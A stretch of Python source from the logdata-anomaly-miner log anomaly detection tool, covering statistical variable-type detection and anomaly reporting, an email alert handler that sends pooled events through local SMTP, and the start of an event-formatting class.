Make an approximated multinomial test which consists of binomial tests if self.used_multinomial_test == 'Approx': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # Makes for each value a twosided BT. If one fails the d-test fails for i, value in enumerate(values_app): if value < self.bt_results[event_index][var_index][1][i] or value > self.bt_results[event_index][var_index][2][i]: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return def d_init_bt(self, event_index, var_index): """Initialize the BT for discrete variables.""" if self.used_multinomial_test == 'MT': # Initialize the list for the results and the multinomialtest self.bt_results[event_index][var_index] = [ [1] * self.num_d_bt, multinomial(self.num_update, self.var_type[event_index][var_index][2])] elif self.used_multinomial_test == 'Approx': # Generates a list of the lower limits of the individual BTs of the single values lower_limit_list = self.num_update - self.bt_min_successes_multi_p( self.num_update, 1 - np.array(self.var_type[event_index][var_index][2]), self.d_alpha / 2, event_index, var_index) # Generates a list of the upper limits of the individual BTs of the single values upper_limit_list = self.bt_min_successes_multi_p( self.num_update, self.var_type[event_index][var_index][2], self.d_alpha / 2, event_index, var_index) # Initialize the list for the results self.bt_results[event_index][var_index] = [[1] * self.num_d_bt, lower_limit_list, upper_limit_list] else: # Initialize the list for the results self.bt_results[event_index][var_index] = [[1] * self.num_d_bt] def init_var_type_history_list(self, event_index): """Initialize the history of the variabletypes of the eventType.""" if len(self.var_type_history_list) < event_index + 1 or self.var_type_history_list[event_index] == []: for _ in range(event_index + 1 - len(self.var_type_history_list)): self.var_type_history_list.append([]) # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] if not self.var_type_history_list[event_index]: self.var_type_history_list[event_index] = [[[], [], [[], []], [], [], [], [[], []], [[], []]] for _ in range(len( self.var_type[event_index]))] # Append the first entries to the history list # Test only the variables with paths in the target_path_list if self.target_path_list is None: index_list = range(self.length[event_index]) # Test all variables else: index_list = self.variable_path_num[event_index] for var_index in index_list: # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for _, val in enumerate(tmp_type_val, start=1): val.append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) def get_indicator(self, event_index): """Calculate and returns a indicator for a change in the system behaviour based on the analysis of VTD.""" # List which stores the single indicators for the variables indicator_list = [] for var_index, var_val in enumerate(self.var_type_history_list[event_index]): if not self.event_type_detector.check_variables[event_index][var_index]: indicator_list.append(0) continue # List, which stores the differences of probabilities of the types, where the current history is higher than the reference. diff_list = [] # Length of the reference len_ref = self.num_var_type_hist_ref # Length of the current historylist len_cur = self.num_var_type_considered_ind # Appends the positive differnces of the probabilities to diff_list for type_index, type_val in enumerate(var_val): if self.var_type_history_list_reference[event_index][var_index][1] == len_ref and sum(var_val[1]) < len_cur: diff_list.append(1) break # Differentiation of the entries, which are lists (e.g. discrete, range, continuously distributed) if type_index in [2, self.var_type_history_list_order.index('range'), self.var_type_history_list_order.index('cont')]: if type_index == self.var_type_history_list_order.index('cont'): # Continuously distributed variable type if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0: diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: var_type_ev = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][ -self.num_var_type_considered_ind:] if x != 0]), 1) var_type_sd = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][ -self.num_var_type_considered_ind:] if x != 0]), 1) # Formula to include the impact of the mean, standard deviation and changes of the distribution if max(self.var_type_history_list_reference[event_index][var_index][type_index][1], var_type_sd) > 0: diff_list.append((min(1, abs((self.var_type_history_list_reference[event_index][var_index][ type_index][0] - var_type_ev) / max(abs(self.var_type_history_list_reference[event_index][var_index][ type_index][0]), abs(var_type_ev))) / 3 + abs((self.var_type_history_list_reference[event_index][ var_index][type_index][1] - var_type_sd) / max(abs(self.var_type_history_list_reference[ event_index][var_index][type_index][1]), abs(var_type_sd))) / 3 + 1 / 3) * len([ x for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0])) / len_cur) else: diff_list.append(0) elif type_index == self.var_type_history_list_order.index('range'): # range type if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0: diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: # Calculate the lower and upper limits lower_limit_cur = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][ -self.num_var_type_considered_ind:] if x != 0]), 1) upper_limit_cur = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][ -self.num_var_type_considered_ind:] if x != 0]), 1) lower_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][0] upper_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][1] # Check if the current history contains at least one range type if lower_limit_cur != upper_limit_cur: # Check if the two intervalls intercept if (upper_limit_ref > lower_limit_cur) and (upper_limit_cur > lower_limit_ref): diff_list.append( (max(0, lower_limit_ref - lower_limit_cur) + max(0, upper_limit_cur - upper_limit_ref)) / (max(upper_limit_cur, upper_limit_ref) - min(lower_limit_cur, lower_limit_ref)) * len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: diff_list.append(len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: diff_list.append(0) else: tmp_max = 0 for j, val in enumerate(type_val): if j == 0 and self.var_type_history_list_reference[event_index][var_index][type_index][j] == 0: tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref)) else: tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref) / 2) diff_list.append(tmp_max) else: if self.var_type_history_list_reference[event_index][var_index][type_index] == 0: diff_list.append(sum(type_val[-self.num_var_type_considered_ind:]) / len_cur) else: diff_list.append(max(0, (sum(type_val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index] / len_ref)) / 2) if len(diff_list) == 0: indicator_list.append(0) else: indicator_list.append(sum(diff_list)) return indicator_list def bt_min_successes(self, num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return num_bt - i return 0 def bt_min_successes_multi_p(self, num_bt, p_list, alpha, event_index, var_index): """Calculate the minimal number of successes for the BT with significance alpha. p_list is a list of probabilities of successes and num_bt is the number of observed tests. """ if f'num_bt = {num_bt}, alpha = {alpha}' in self.bt_min_succ_data: # Here the min_successes are not being generated, but instead the right Indices are searched for in the bt_min_succ_data-list return np.searchsorted(self.bt_min_succ_data[f'num_bt = {num_bt}, alpha = {alpha}'], p_list, side='left', sorter=None) # Calculate the min_successes normally for each value one by one tmp_list = [] for i in range(len(self.var_type[event_index][var_index][1])): tmp_list.append(self.bt_min_successes(num_bt, p_list[i], alpha)) tmp_list = np.array(tmp_list) return tmp_list def print_initial_var_type(self, event_index, log_atom): """Print the initial variable types.""" if self.silence_output_without_confidence or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) message = f'Initial detection of variable types of event {self.event_type_detector.get_event_type(event_index)}:' tmp_string = '' type_info = {} for var_index in range(self.length[event_index]): if self.var_type[event_index][var_index]: tmp_string += f" Path '{self.event_type_detector.variable_key_list[event_index][var_index]}': " \ f"{get_vt_string(self.var_type[event_index][var_index])}\n" type_info[self.event_type_detector.variable_key_list[event_index][var_index]] = self.var_type[event_index][var_index] tmp_string = tmp_string.lstrip(' ') original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [tmp_string + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [tmp_string + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def print_changed_var_type(self, event_index, vt_old, vt_new, var_index, log_atom, confidence=None): """Print the changed variable types.""" if self.save_statistics and ((self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1)): self.changed_var_types.append(self.event_type_detector.num_event_lines[event_index]) if (self.silence_output_without_confidence and confidence is None) or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} vt_old_string = get_vt_string(vt_old) vt_new_string = get_vt_string(vt_new) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} changed from {vt_old_string} to {vt_new_string} after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print_reject_var_type(self, event_index, vt, var_index, log_atom): """Print the changed variable types.""" if self.silence_output_without_confidence or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} would reject the type '{vt[0]}' after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print(self, message, log_atom, affected_path, confidence=None, indicator=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if (self.silence_output_without_confidence and confidence is None) or ( self.silence_output_except_indicator and indicator is None): return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + data] analysis_component = {'AffectedLogAtomPaths': affected_path} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the " "last 60 minutes.", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the " "last 60 minutes. Following new variable types were learned: %s", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 def convert_to_floats(list_in): """Give back false if one entry of the list is no float and returns the list of floats otherwise.""" num_list = [] for item in list_in: try: num_list.append(float(item)) except (ValueError, TypeError): return [] return num_list def consists_of_floats(list_in): """Give back false if one entry of the list is no float or integer. True otherwise. """ return all(isinstance(x, (float, int)) for x in list_in) def consists_of_ints(list_in): """Give back True if all entries are integers an False otherwise.""" return all(item == int(item) for item in list_in) def get_vt_string(vt): """Return a string which states the variable type with selected parameters.""" if vt[0] == 'stat': return_string = f'{vt[0]} {vt[1]}' elif vt[0] == 'd': return_string = vt[0] + ' [' for i, val in enumerate(vt[2]): if val >= 0.1: return_string += f'"{str(vt[1][i])}"({str(int(val*100+0.5))}%), ' if any(val < 0.1 for _, val in enumerate(vt[2])): return_string += '...]' else: return_string = return_string[:-2] return_string += ']' elif vt[0] in ('asc', 'desc'): return_string = f'{vt[0]} [{vt[1]}]' elif vt[0] == 'unq': return_string = vt[0] elif vt[0] == 'others': return_string = vt[0] elif vt[0] == 'range': return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]' elif vt[0] == 'uni': return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]' elif vt[0] == 'nor': return_string = f'{vt[0]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'spec': return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'beta': if vt[5] == 1: return_string = f'{vt[0]}{vt[5]} [min: {vt[3]}, max: {vt[4]}]' else: return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'betam': return_string = f'{vt[0]} [min: {vt[3]}, max: {vt[4]}, proportion: {vt[5]}]' else: return_string = vt[0] return return_string def cramervonmises(rvs, cdf, args=()): """Return the cramer von mises gof test statistic.""" if isinstance(cdf, str): cdf = getattr(distributions, cdf).cdf vals = np.sort(np.asarray(rvs)) if vals.size <= 1: raise ValueError('The sample must contain at least two observations.') if vals.ndim > 1: raise ValueError('The sample must be one-dimensional.') n = len(vals) cdfvals = cdf(vals, *args) sum_val = 0 for i in range(n): sum_val += ((2*i+1)/(2*n)-cdfvals[i])**2 return 1/(12*n) + sum_val def cramervonmises2(rvs1, rvs2): """Return the cramer von mises two sample homogeneity test statistic.""" vals1 = np.sort(np.asarray(rvs1)) vals2 = np.sort(np.asarray(rvs2)) if vals1.size <= 1 or vals2.size <= 1: raise ValueError('The sample must contain at least two observations.') if vals1.ndim > 1 or vals2.ndim > 1: raise ValueError('The sample must be one-dimensional.') n1 = len(vals1) n2 = len(vals2) sum_val = 0 index1 = 0 index2 = 0 for i in range(n1+n2): if index1 < n1 and (index2 == n2-1 or vals1[index1] < vals2[index2]): sum_val += n1*(i-index1)**2 index1 += 1 else: sum_val += n2*(i-index2)**2 index2 += 1 return sum_val/(n1*n2*(n1+n2)) - (1*n1*n2-1)/(6*(n1+n2)) def durbin_watson(rvs): """Return the durbin watson test statistic.""" return sum((rvs[i+1] - rvs[i])**2 for i in range(len(rvs) - 1)) / sum(rvs[i]**2 for i in range(len(rvs))) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/000077500000000000000000000000001500476301700305075ustar00rootroot00000000000000DefaultMailNotificationEventHandler.py000066400000000000000000000271361500476301700400510ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines the event handler for reporting via emails. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import shlex import time import re from smtplib import SMTP, SMTPException import logging import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventData import EventData class DefaultMailNotificationEventHandler(EventHandlerInterface, TimeTriggeredComponentInterface): """This class implements an event record listener. It will pool received events, reduce the amount of events below the maximum number allowed per timeframe, create text representation of received events and send them via "sendmail" transport. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME CONFIG_KEY_MAIL_TARGET_ADDRESS = "MailAlerting.TargetAddress" CONFIG_KEY_MAIL_FROM_ADDRESS = "MailAlerting.FromAddress" CONFIG_KEY_MAIL_SUBJECT_PREFIX = "MailAlerting.SubjectPrefix" CONFIG_KEY_MAIL_ALERT_GRACE_TIME = "MailAlerting.AlertGraceTime" CONFIG_KEY_EVENT_COLLECT_TIME = "MailAlerting.EventCollectTime" CONFIG_KEY_ALERT_MIN_GAP = "MailAlerting.MinAlertGap" CONFIG_KEY_ALERT_MAX_GAP = "MailAlerting.MaxAlertGap" CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = "MailAlerting.MaxEventsPerMessage" def __init__(self, analysis_context): """Initialize the event handler. @param analysis_context used to get the aminer config and the config_properties. """ handler = DefaultMailNotificationEventHandler self.analysis_context = analysis_context cp = analysis_context.aminer_config.config_properties # @see https://emailregex.com/ is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$") self.recipient_address = shlex.quote(cp.get(handler.CONFIG_KEY_MAIL_TARGET_ADDRESS)) if self.recipient_address is None: msg = "Cannot create e-mail notification listener without target address" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.sender_address = shlex.quote(cp.get(handler.CONFIG_KEY_MAIL_FROM_ADDRESS)) if not is_email.match(self.recipient_address) or not is_email.match(self.sender_address): msg = "MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) prefix = cp.get(handler.CONFIG_KEY_MAIL_SUBJECT_PREFIX, "AMiner Alerts:") if not isinstance(prefix, str): msg = "MailAlerting.SubjectPrefix must be of type string!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.subject_prefix = shlex.quote(prefix) self.alert_grace_time_end = cp.get(handler.CONFIG_KEY_MAIL_ALERT_GRACE_TIME, 0) if isinstance(self.alert_grace_time_end, bool) or not isinstance(self.alert_grace_time_end, (int, float)): msg = "MailAlerting.AlertGraceTime must be of type int or float!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.alert_grace_time_end < 0: msg = "MailAlerting.AlertGraceTime must be greater than zero!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.alert_grace_time_end > 0: self.alert_grace_time_end += time.time() self.event_collect_time = cp.get(handler.CONFIG_KEY_EVENT_COLLECT_TIME, 10) if isinstance(self.event_collect_time, bool) or not isinstance(self.event_collect_time, (int, float)): msg = "MailAlerting.EventCollectTime must be of type int or float!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.event_collect_time < 0: msg = "MailAlerting.EventCollectTime must be greater than zero!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.min_alert_gap = cp.get(handler.CONFIG_KEY_ALERT_MIN_GAP, 600) if isinstance(self.min_alert_gap, bool) or not isinstance(self.min_alert_gap, (int, float)): msg = "MailAlerting.MinAlertGap must be of type int or float!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.min_alert_gap < 0: msg = "MailAlerting.MinAlertGap must be greater than zero!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.max_alert_gap = cp.get(handler.CONFIG_KEY_ALERT_MAX_GAP, 600) if isinstance(self.max_alert_gap, bool) or not isinstance(self.max_alert_gap, (int, float)): msg = "MailAlerting.MaxAlertGap must be of type int or float!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_alert_gap < 0: msg = "MailAlerting.MaxAlertGap must be greater than zero!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.max_alert_gap < self.min_alert_gap: msg = "MailAlerting.MaxAlertGap must be greater than MailAlerting.MinAlertGap!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.max_events_per_message = cp.get(handler.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, 1000) if isinstance(self.max_events_per_message, bool) or not isinstance(self.max_events_per_message, (int, float)): msg = "MailAlerting.MaxEventsPerMessage must be of type int or float!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_events_per_message < 1: msg = "MailAlerting.MaxEventsPerMessage must be greater than zero!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.events_collected = 0 self.event_collection_start_time = 0 self.last_alert_time = 0 self.next_alert_time = 0 self.current_alert_gap = self.min_alert_gap self.current_message = "" def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True if self.alert_grace_time_end != 0: if self.alert_grace_time_end >= time.time(): return True self.alert_grace_time_end = 0 component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True # Avoid too many calls to the operating system time() current_time = time.time() if self.events_collected < self.max_events_per_message: if self.events_collected == 0: self.event_collection_start_time = current_time self.events_collected += 1 event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context) self.current_message += event_data_obj.receive_event_string() if self.next_alert_time == 0: if self.last_alert_time != 0: # This is the first event received after sending of a previous notification. If the currentAlertGap has not elapsed, # increase the gap immediately. self.next_alert_time = self.last_alert_time + self.current_alert_gap if self.next_alert_time < current_time: # We are already out of the required gap. self.current_alert_gap = self.min_alert_gap self.last_alert_time = 0 self.next_alert_time = current_time + self.event_collect_time else: # Increase the gap self.current_alert_gap *= 1.5 if self.current_alert_gap > self.max_alert_gap: self.current_alert_gap = self.max_alert_gap else: # No relevant last alert time recorded, just use default. self.next_alert_time = current_time + self.event_collect_time if (self.next_alert_time != 0) and (current_time >= self.next_alert_time): self.send_notification(current_time) return True def do_timer(self, trigger_time): """Check exit status of previous mail sending procedures and check if alerts should be sent.""" if (self.next_alert_time != 0) and (trigger_time >= self.next_alert_time): self.send_notification(trigger_time) return 10 def send_notification(self, trigger_time): """Really send out the message.""" if self.events_collected == 0: return subject_text = f"{self.subject_prefix} Collected Events" if self.last_alert_time != 0: subject_text += f" in the last {trigger_time - self.last_alert_time} seconds" message = "From: %s\nTo: %s\nSubject: %s\n\n%s\n" % ( self.sender_address, self.recipient_address, subject_text, self.current_message) try: # timeout explicitly needs to be set None, because in python version < 3.7 socket.settimeout() sets the socket type # SOCK_NONBLOCKING and the code fails. smtp_obj = SMTP("127.0.0.1", port=25, timeout=5) smtp_obj.sendmail(self.sender_address, self.recipient_address, message) smtp_obj.quit() except SMTPException as e: print(e, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(e) self.last_alert_time = trigger_time self.events_collected = 0 self.current_message = "" self.next_alert_time = 0 logging.getLogger(DEBUG_LOG_NAME).debug("%s sent notification.", self.__class__.__name__) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/EventData.py000066400000000000000000000074541500476301700327460ustar00rootroot00000000000000""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX from aminer import AminerConfig class EventData: """This class is used to create a string for different event handlers.""" def __init__(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source, analysis_context): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. @param analysis_context the analysis context used to get the component. """ self.event_type = event_type self.event_message = event_message self.sorted_log_lines = sorted_loglines self.event_data = event_data self.event_source = event_source self.analysis_context = analysis_context if analysis_context is not None: self.description = f'"{analysis_context.get_name_by_component(event_source)}"' else: self.description = "" if log_atom is None: return self.log_atom = log_atom def receive_event_string(self): """Receive an event string.""" message = "" if self.event_message is not None: indent = " " if 